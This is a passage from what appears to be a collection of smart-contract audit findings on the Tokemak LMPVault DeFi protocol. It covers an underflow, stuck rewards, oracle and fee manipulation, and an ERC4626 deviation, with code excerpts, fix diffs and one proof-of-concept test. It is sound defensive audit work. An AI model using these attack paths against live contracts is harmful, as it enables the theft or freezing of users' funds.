{\\n info.idleIncrease =\\n Math.max(info.debtDecrease, info.totalAssetsPulled) -\\n info.totalAssetsToPull;\\n if (info.totalAssetsPulled >= info.debtDecrease) {\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n }\\n break;\\n }\\n\\n // No need to keep going if we have the amount we're looking for\\n // Any overage is accounted for above. Anything lower and we need to keep going\\n // slither-disable-next-line incorrect-equality\\n if (\\n Math.max(info.debtDecrease, info.totalAssetsPulled) ==\\n info.totalAssetsToPull\\n ) {\\n break;\\n }\\n```\\nчThe vulnerability can result in the contract reverting due to an underflow, disrupting the functionality of the contract. Users who try to withdraw assets from the LMPVault may encounter transaction failures and be unable to withdraw their assets.ч```\\n function test_revert_underflow() public {\\n _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\n // User is going to deposit 1500 asset\\n _asset.mint(address(this), 1500);\\n _asset.approve(address(_lmpVault), 1500);\\n _lmpVault.deposit(1500, address(this));\\n\\n // Deployed 700 asset to DV1\\n _underlyerOne.mint(address(this), 700);\\n _underlyerOne.approve(address(_lmpVault), 700);\\n _lmpVault.rebalance(\\n address(_destVaultOne),\\n address(_underlyerOne), // tokenIn\\n 700,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 700\\n );\\n\\n // Deploy 600 asset to DV2\\n _underlyerTwo.mint(address(this), 600);\\n _underlyerTwo.approve(address(_lmpVault), 600);\\n _lmpVault.rebalance(\\n address(_destVaultTwo),\\n address(_underlyerTwo), // tokenIn\\n 600,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 600\\n );\\n\\n // Deployed 200 asset to DV3\\n _underlyerThree.mint(address(this), 200);\\n _underlyerThree.approve(address(_lmpVault), 200);\\n _lmpVault.rebalance(\\n address(_destVaultThree),\\n address(_underlyerThree), // tokenIn\\n 200,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 200\\n );\\n\\n // Drop the price of DV2 to 70% of original, so that 600 we transferred out is now only worth 420\\n _mockRootPrice(address(_underlyerTwo), 7e17);\\n\\n // Revert because of an arithmetic underflow\\n vm.expectRevert();\\n uint256 assets = _lmpVault.redeem(1000, address(this), address(this));\\n }\\n```\\n -Unable to withdraw extra rewardsчmediumчSuppose Bob only has 9999 Wei TOKE tokens as main rewards and 100e18 DAI as extra rewards in this account.\\nWhen attempting to get the rewards, the code will always get the main rewards, followed by the extra rewards, as shown below.\\n```\\nFile: MainRewarder.sol\\n function _processRewards(address account, bool claimExtras) internal {\\n _getReward(account);\\n\\n //also get rewards from linked rewards\\n if (claimExtras) {\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).getReward(account);\\n }\\n }\\n }\\n```\\n\\nIf the main reward is TOKE, they will be staked to the `GPToke` at Line 376 below.\\n```\\nFile: AbstractRewarder.sol\\n function _getReward(address account) internal {\\n Errors.verifyNotZero(account, \"account\");\\n\\n uint256 reward = earned(account);\\n (IGPToke gpToke, address tokeAddress) = (systemRegistry.gpToke(), address(systemRegistry.toke()));\\n\\n // slither-disable-next-line incorrect-equality\\n if (reward == 0) return;\\n\\n rewards[account] = 0;\\n emit RewardPaid(account, reward);\\n\\n // if NOT toke, or staking is turned off (by duration = 0), just send reward back\\n if (rewardToken != tokeAddress || tokeLockDuration == 0) {\\n IERC20(rewardToken).safeTransfer(account, reward);\\n } else {\\n // authorize gpToke to get our reward Toke\\n // slither-disable-next-line unused-return\\n IERC20(address(tokeAddress)).approve(address(gpToke), reward);\\n\\n // stake Toke\\n gpToke.stake(reward, tokeLockDuration, account);\\n }\\n }\\n```\\n\\nHowever, if the staked amount is less than the minimum stake amount (MIN_STAKE_AMOUNT), the function will revert.\\n```\\nFile: GPToke.sol\\n uint256 public constant MIN_STAKE_AMOUNT = 10_000;\\n..SNIP..\\n function _stake(uint256 amount, uint256 duration, address to) internal whenNotPaused {\\n //\\n // validation checks\\n //\\n if (to == address(0)) revert ZeroAddress();\\n if (amount < MIN_STAKE_AMOUNT) revert StakingAmountInsufficient();\\n if (amount > MAX_STAKE_AMOUNT) revert StakingAmountExceeded();\\n```\\n\\nIn this case, Bob will not be able to redeem his 100 DAI reward when processing the reward. The code will always attempt to stake 9999 Wei Toke and revert because it fails to meet the minimum stake amount.чTo remediate the issue, consider collecting TOKE and staking it to the `GPToke` contract only if it meets the minimum stake amount.\\n```\\nfunction _getReward(address account) internal {\\n Errors.verifyNotZero(account, \"account\");\\n\\n uint256 reward = earned(account);\\n (IGPToke gpToke, address tokeAddress) = (systemRegistry.gpToke(), address(systemRegistry.toke()));\\n\\n // slither// Remove the line below\\ndisable// Remove the line below\\nnext// Remove the line below\\nline incorrect// Remove the line below\\nequality\\n if (reward == 0) return;\\n\\n// Remove the line below\\n rewards[account] = 0;\\n// Remove the line below\\n emit RewardPaid(account, reward);\\n\\n // if NOT toke, or staking is turned off (by duration = 0), just send reward back\\n if (rewardToken != tokeAddress || tokeLockDuration == 0) {\\n// Add the line below\\n rewards[account] = 0;\\n// Add the line below\\n emit RewardPaid(account, reward);\\n IERC20(rewardToken).safeTransfer(account, reward);\\n } else {\\n// Add the line below\\n if (reward >= MIN_STAKE_AMOUNT) {\\n// Add the line below\\n rewards[account] = 0;\\n// Add the line below\\n emit RewardPaid(account, reward);\\n// Add the line below\\n\\n // authorize gpToke to get our reward Toke\\n // slither// Remove the line below\\ndisable// Remove the line below\\nnext// Remove the line below\\nline unused// Remove the line below\\nreturn\\n IERC20(address(tokeAddress)).approve(address(gpToke), reward);\\n\\n // stake Toke\\n gpToke.stake(reward, tokeLockDuration, account);\\n// Add the line below\\n }\\n }\\n}\\n```\\nчThere is no guarantee that the users' TOKE rewards will always be larger than `MIN_STAKE_AMOUNT` as it depends on various factors such as the following:\\nThe number of vault shares they hold. If they hold little shares, their TOKE reward will be insignificant\\nIf their holding in the vault is small compared to the others and the entire vault, the TOKE reward they received will be insignificant\\nThe timing they join the vault. If they join after the reward is distributed, they will not be entitled to it.\\nAs such, the affected users will not be able to withdraw their extra rewards, and they will be stuck in the contract.ч```\\nFile: MainRewarder.sol\\n function _processRewards(address account, bool claimExtras) internal {\\n _getReward(account);\\n\\n //also get rewards from linked rewards\\n if (claimExtras) {\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).getReward(account);\\n }\\n }\\n }\\n```\\n -Malicious or compromised admin of certain LSTs could manipulate the priceчmediumчImportant Per the contest detail page, admins of the external protocols are marked as \"Restricted\" (Not Trusted). This means that any potential issues arising from the external protocol's admin actions (maliciously or accidentally) are considered valid in the context of this audit.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED?\\nRESTRICTED\\nNote This issue also applies to other support Liquid Staking Tokens (LSTs) where the admin could upgrade the token contract code. Those examples are omitted for brevity, as the write-up and mitigation are the same and would duplicate this issue.\\nPer the contest detail page, the protocol will hold and interact with the Swell ETH (swETH).\\nLiquid Staking Tokens\\nswETH: 0xf951E335afb289353dc249e82926178EaC7DEd78\\nUpon inspection of the swETH on-chain contract, it was found that it is a Transparent Upgradeable Proxy. This means that the admin of Swell protocol could upgrade the contracts.\\nTokemak relies on the `swEth.swETHToETHRate()` function to determine the price of the swETH LST within the protocol. Thus, a malicious or compromised admin of Swell could upgrade the contract to have the `swETHToETHRate` function return an extremely high to manipulate the total values of the vaults, resulting in users being able to withdraw more assets than expected, thus draining the LMPVault.\\n```\\nFile: SwEthEthOracle.sol\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n // Prevents incorrect config at root level.\\n if (token != address(swEth)) revert Errors.InvalidToken(token);\\n\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\nчThe protocol team should be aware of the above-mentioned risks and consider implementing additional controls to reduce the risks.\\nReview each of the supported LSTs and determine how much power the Liquid staking protocol team/admin has over its tokens.\\nFor LSTs that are more centralized (e.g., Liquid staking protocol team could update the token contracts or have the ability to update the exchange rate/price to an arbitrary value without any limit), those LSTs should be subjected to additional controls or monitoring, such as implementing some form of circuit breakers if the price deviates beyond a reasonable percentage to reduce the negative impact to Tokemak if it happens.чLoss of assets in the scenario as described above.ч```\\nFile: SwEthEthOracle.sol\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n // Prevents incorrect config at root level.\\n if (token != address(swEth)) revert Errors.InvalidToken(token);\\n\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n -`previewRedeem` and `redeem` functions deviate from the ERC4626 specificationчmediumчImportant The contest page explicitly mentioned that the `LMPVault` must conform with the ERC4626. Thus, issues related to EIP compliance should be considered valid in the context of this audit.\\nQ: Is the code/contract expected to comply with any EIPs? Are there specific assumptions around adhering to those EIPs that Watsons should be aware of?\\nsrc/vault/LMPVault.sol should be 4626 compatible\\nLet the value returned by `previewRedeem` function be $asset_{preview}$ and the actual number of assets obtained from calling the `redeem` function be $asset_{actual}$.\\nThe following specification of `previewRedeem` function is taken from ERC4626 specification:\\nAllows an on-chain or off-chain user to simulate the effects of their redeemption at the current block, given current on-chain conditions.\\nMUST return as close to and no more than the exact amount of `assets` that would be withdrawn in a `redeem` call in the same transaction. I.e. `redeem` should return the same or more `assets` as `previewRedeem` if called in the same transaction.\\nIt mentioned that the `redeem` should return the same or more `assets` as `previewRedeem` if called in the same transaction, which means that it must always be $asset_{preview} \\le asset_{actual}$.\\nHowever, it is possible that the `redeem` function might return fewer assets than the number of assets previewed by the `previewRedeem` ($asset_{preview} > asset_{actual}$), thus it does not conform to the specification.\\n```\\nFile: LMPVault.sol\\n function redeem(\\n uint256 shares,\\n address receiver,\\n address owner\\n ) public virtual override nonReentrant noNavDecrease ensureNoNavOps returns (uint256 assets) {\\n uint256 maxShares = maxRedeem(owner);\\n if (shares > maxShares) {\\n revert ERC4626ExceededMaxRedeem(owner, shares, maxShares);\\n }\\n uint256 possibleAssets = previewRedeem(shares); // @audit-info round down, which is correct because user won't get too many\\n\\n assets = _withdraw(possibleAssets, shares, receiver, owner);\\n }\\n```\\n\\nNote that the `previewRedeem` function performs its computation based on the cached `totalDebt` and `totalIdle`, which might not have been updated to reflect the actual on-chain market condition. Thus, these cached values might be higher than expected.\\nAssume that `totalIdle` is zero and all WETH has been invested in the destination vaults. Thus, `totalAssetsToPull` will be set to $asset_{preview}$.\\nIf a DV is making a loss, users could only burn an amount proportional to their ownership of this vault. The code will go through all the DVs in the withdrawal queue (withdrawalQueueLength) in an attempt to withdraw as many assets as possible. However, it is possible that the `totalAssetsPulled` to be less than $asset_{preview}$.\\n```\\nFile: LMPVault.sol\\n function _withdraw(\\n uint256 assets,\\n uint256 shares,\\n address receiver,\\n address owner\\n ) internal virtual returns (uint256) {\\n uint256 idle = totalIdle;\\n WithdrawInfo memory info = WithdrawInfo({\\n currentIdle: idle,\\n assetsFromIdle: assets >= idle ? idle : assets,\\n totalAssetsToPull: assets - (assets >= idle ? idle : assets),\\n totalAssetsPulled: 0,\\n idleIncrease: 0,\\n debtDecrease: 0\\n });\\n\\n // If not enough funds in idle, then pull what we need from destinations\\n if (info.totalAssetsToPull > 0) {\\n uint256 totalVaultShares = totalSupply();\\n\\n // Using pre-set withdrawalQueue for withdrawal order to help minimize user gas\\n uint256 withdrawalQueueLength = withdrawalQueue.length;\\n for (uint256 i = 0; i < withdrawalQueueLength; ++i) {\\n IDestinationVault destVault = IDestinationVault(withdrawalQueue[i]);\\n (uint256 sharesToBurn, uint256 totalDebtBurn) = _calcUserWithdrawSharesToBurn(\\n destVault,\\n shares,\\n info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled),\\n totalVaultShares\\n );\\n..SNIP..\\n // At this point should have all the funds we need sitting in in the vault\\n uint256 returnedAssets = info.assetsFromIdle + info.totalAssetsPulled;\\n```\\nчEnsure that $asset_{preview} \\le asset_{actual}$.\\nAlternatively, document that the `previewRedeem` and `redeem` functions deviate from the ERC4626 specification in the comments and/or documentation.чIt was understood from the protocol team that they anticipate external parties to integrate directly with the LMPVault (e.g., vault shares as collateral). Thus, the LMPVault must be ERC4626 compliance. Otherwise, the caller (internal or external) of the `previewRedeem` function might receive incorrect information, leading to the wrong action being executed.ч```\\nFile: LMPVault.sol\\n function redeem(\\n uint256 shares,\\n address receiver,\\n address owner\\n ) public virtual override nonReentrant noNavDecrease ensureNoNavOps returns (uint256 assets) {\\n uint256 maxShares = maxRedeem(owner);\\n if (shares > maxShares) {\\n revert ERC4626ExceededMaxRedeem(owner, shares, maxShares);\\n }\\n uint256 possibleAssets = previewRedeem(shares); // @audit-info round down, which is correct because user won't get too many\\n\\n assets = _withdraw(possibleAssets, shares, receiver, owner);\\n }\\n```\\n -Malicious users could lock in the NAV/Share of the DV to cause the loss of feesчmediumчThe `_collectFees` function only collects fees whenever the NAV/Share exceeds the last NAV/Share.\\nDuring initialization, the `navPerShareHighMark` is set to `1`, effectively `1` ETH per share (1:1 ratio). Assume the following:\\nIt is at the early stage, and only a few shares (0.5 shares) were minted in the LMPVault\\nThere is a sudden increase in the price of an LP token in a certain DV (Temporarily)\\n`performanceFeeBps` is 10%\\nIn this case, the debt value of DV's shares will increase, which will cause LMPVault's debt to increase. This event caused the `currentNavPerShare` to increase to `1.4` temporarily.\\nSomeone calls the permissionless `updateDebtReporting` function. Thus, the profit will be `0.4 ETH * 0.5 Shares = 0.2 ETH`, which is small due to the number of shares (0.5 shares) in the LMPVault at this point. The fee will be `0.02 ETH` (~40 USD). Thus, the fee earned is very little and almost negligible.\\nAt the end of the function, the `navPerShareHighMark` will be set to `1.4`, and the highest NAV/Share will be locked forever. After some time, the price of the LP tokens fell back to its expected price range, and the `currentNavPerShare` fell to around `1.05`. No fee will be collected from this point onwards unless the NAV/Share is raised above `1.4`.\\nIt might take a long time to reach the `1.4` threshold, or in the worst case, the spike is temporary, and it will never reach `1.4` again. So, when the NAV/Share of the LMPVault is 1.0 to `1.4`, the protocol only collects `0.02 ETH` (~40 USD), which is too little.\\n```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // Set our new high water mark, the last nav/share height we took fees\\n navPerShareHighMark = currentNavPerShare;\\n navPerShareHighMarkTimestamp = block.timestamp;\\n emit NewNavHighWatermark(currentNavPerShare, block.timestamp);\\n }\\n emit FeeCollected(fees, sink, shares, profit, idle, debt);\\n}\\n```\\nчIssue Malicious users could lock in the NAV/Share of the DV to cause the loss of fees\\nConsider implementing a sophisticated off-chain algorithm to determine the right time to lock the `navPerShareHighMark` and/or restrict the access to the `updateDebtReporting` function to only protocol-owned addresses.чLoss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.ч```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // Set our new high water mark, the last nav/share height we took fees\\n navPerShareHighMark = currentNavPerShare;\\n navPerShareHighMarkTimestamp = block.timestamp;\\n emit NewNavHighWatermark(currentNavPerShare, block.timestamp);\\n }\\n emit FeeCollected(fees, sink, shares, profit, idle, debt);\\n}\\n```\\n -Malicious users could use back old valuesчmediumчPer the Teller's User Checklist, it is possible that a potential attacker could go back in time to find a desired value in the event that a Tellor value is disputed. Following is the extract taken from the checklist:\\nEnsure that functions do not use old Tellor values\\nIn the event where a Tellor value is disputed, the disputed value is removed & previous values remain. Prevent potential attackers from going back in time to find a desired value with a check in your contracts. This repo is a great reference for integrating Tellor.\\nThe current implementation lack measure to guard against such attack.\\n```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n\\nAnyone can submit a dispute to Tellor by paying a fee. The disputed values are immediately removed upon submission, and the previous values will remain. The attacks are profitable as long as the economic gains are higher than the dispute fee. For instance, this can be achieved by holding large amounts of vault shares (e.g., obtained using own funds or flash-loan) to amplify the gain before manipulating the assets within it to increase the values.чUpdate the affected function as per the recommendation in Teller's User Checklist.\\n```\\nfunction getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n \\n// Add the line below\\n if (timestampRetrieved > lastStoredTimestamps[tellorInfo.queryId]) {\\n// Add the line below\\n lastStoredTimestamps[tellorInfo.queryId] = timestampRetrieved;\\n// Add the line below\\n lastStoredPrices[tellorInfo.queryId] = value;\\n// Add the line below\\n } else {\\n// Add the line below\\n value = lastStoredPrices[tellorInfo.queryId]\\n// Add the line below\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n}\\n```\\nчMalicious users could manipulate the price returned by the oracle to be higher or lower than expected. The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIncorrect pricing would result in many implications that lead to a loss of assets, such as users withdrawing more or fewer assets than expected due to over/undervalued vaults or strategy allowing an unprofitable rebalance to be executed.ч```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n -Incorrect handling of Stash Tokens within the `ConvexRewardsAdapter._claimRewards()`чmediumчThe primary task of the `ConvexRewardAdapter._claimRewards()` function revolves around claiming rewards for Convex/Aura staked LP tokens.\\n```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n // rest of code \\n\\n // Record balances before claiming\\n for (uint256 i = 0; i < totalLength; ++i) {\\n // The totalSupply check is used to identify stash tokens, which can\\n // substitute as rewardToken but lack a \"balanceOf()\"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balancesBefore[i] = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n }\\n\\n // Claim rewards\\n bool result = rewardPool.getReward(account, /*_claimExtras*/ true);\\n if (!result) {\\n revert RewardAdapter.ClaimRewardsFailed();\\n }\\n\\n // Record balances after claiming and calculate amounts claimed\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for \"stash tokens\"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n if (sendTo != address(this) && amountsClaimed[i] > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(sendTo, amountsClaimed[i]);\\n }\\n }\\n\\n RewardAdapter.emitRewardsClaimed(rewardTokens, amountsClaimed);\\n\\n return (amountsClaimed, rewardTokens);\\n}\\n```\\n\\nAn intriguing aspect of this function's logic lies in its management of \"stash tokens\" from AURA staking. The check to identify whether `rewardToken[i]` is a stash token involves attempting to invoke `IERC20(rewardTokens[i]).totalSupply()`. If the returned total supply value is `0`, the implementation assumes the token is a stash token and bypasses it. However, this check is flawed since the total supply of stash tokens can indeed be non-zero. For instance, at this address, the stash token has `totalSupply = 150467818494283559126567`, which is definitely not zero.\\nThis misstep in checking can potentially lead to a Denial-of-Service (DOS) situation when calling the `claimRewards()` function. This stems from the erroneous attempt to call the `balanceOf` function on stash tokens, which lack the `balanceOf()` method. Consequently, such incorrect calls might incapacitate the destination vault from claiming rewards from AURA, resulting in protocol losses.чTo accurately determine whether a token is a stash token, it is advised to perform a low-level `balanceOf()` call to the token and subsequently validate the call's success.чThe `AuraRewardsAdapter.claimRewards()` function could suffer from a Denial-of-Service (DOS) scenario.\\nThe destination vault's ability to claim rewards from AURA staking might be hampered, leading to protocol losses.ч```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n // rest of code \\n\\n // Record balances before claiming\\n for (uint256 i = 0; i < totalLength; ++i) {\\n // The totalSupply check is used to identify stash tokens, which can\\n // substitute as rewardToken but lack a \"balanceOf()\"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balancesBefore[i] = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n }\\n\\n // Claim rewards\\n bool result = rewardPool.getReward(account, /*_claimExtras*/ true);\\n if (!result) {\\n revert RewardAdapter.ClaimRewardsFailed();\\n }\\n\\n // Record balances after claiming and calculate amounts claimed\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for \"stash tokens\"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n if (sendTo != address(this) && amountsClaimed[i] > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(sendTo, amountsClaimed[i]);\\n }\\n }\\n\\n RewardAdapter.emitRewardsClaimed(rewardTokens, amountsClaimed);\\n\\n return (amountsClaimed, rewardTokens);\\n}\\n```\\n -`navPerShareHighMark` not reset to 1.0чmediumчThe LMPVault will only collect fees if the current NAV (currentNavPerShare) is more than the last NAV (effectiveNavPerShareHighMark).\\n```\\nFile: LMPVault.sol\\n function _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n```\\n\\nAssume the current LMPVault state is as follows:\\ntotalAssets = 15 WETH\\ntotalSupply = 10 shares\\nNAV/share = 1.5\\neffectiveNavPerShareHighMark = 1.5\\nAlice owned all the remaining shares in the vault, and she decided to withdraw all her 10 shares. As a result, the `totalAssets` and `totalSupply` become zero. It was found that when all the shares have been exited, the `effectiveNavPerShareHighMark` is not automatically reset to 1.0.\\nAssume that at some point later, other users started to deposit into the LMPVault, and the vault invests the deposited WETH to profitable destination vaults, resulting in the real/actual NAV rising from 1.0 to 1.49 over a period of time.\\nThe system is designed to collect fees when there is a rise in NAV due to profitable investment from sound rebalancing strategies. However, since the `effectiveNavPerShareHighMark` has been set to 1.5 previously, no fee is collected when the NAV rises from 1.0 to 1.49, resulting in a loss of fee.чConsider resetting the `navPerShareHighMark` to 1.0 whenever a vault has been fully exited.\\n```\\nfunction _withdraw(\\n uint256 assets,\\n uint256 shares,\\n address receiver,\\n address owner\\n) internal virtual returns (uint256) {\\n..SNIP..\\n _burn(owner, shares);\\n \\n// Add the line below\\n if (totalSupply() == 0) navPerShareHighMark = MAX_FEE_BPS;\\n\\n emit Withdraw(msg.sender, receiver, owner, returnedAssets, shares);\\n\\n _baseAsset.safeTransfer(receiver, returnedAssets);\\n\\n return returnedAssets;\\n}\\n```\\nчLoss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.ч```\\nFile: LMPVault.sol\\n function _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n```\\n -Vault cannot be added back into the vault registryчmediumчWhen removing a vault from the registry, all states related to the vaults such as the `_vaults`, `_assets`, `_vaultsByAsset` are cleared except the `_vaultsByType` state.\\n```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, \"vaultAddress\");\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n\\nThe uncleared `_vaultsByType` state will cause the `addVault` function to revert when trying to add the vault back into the registry even though the vault does not exist in the registry anymore.\\n```\\n if (!_vaultsByType[vaultType].add(vaultAddress)) revert VaultAlreadyExists(vaultAddress);\\n```\\nчClear the `_vaultsByType` state when removing the vault from the registry.\\n```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, \"vaultAddress\");\\n// Add the line below\\n ILMPVault vault = ILMPVault(vaultAddress);\\n// Add the line below\\n bytes32 vaultType = vault.vaultType();\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n// Add the line below\\n if 